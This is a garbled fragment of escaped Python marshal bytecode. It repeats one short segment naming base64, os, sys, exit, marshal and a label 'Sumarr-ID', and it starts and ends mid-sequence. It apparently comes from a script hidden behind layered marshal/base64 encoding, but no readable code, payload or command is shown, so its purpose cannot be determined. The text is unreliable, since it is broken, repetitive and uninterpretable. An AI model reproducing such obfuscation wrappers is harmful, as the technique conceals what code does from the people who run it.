x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x
00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x0
-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\
x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x
00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x0
0\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\
x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<modu
le>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\
x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\
x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00S
umarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00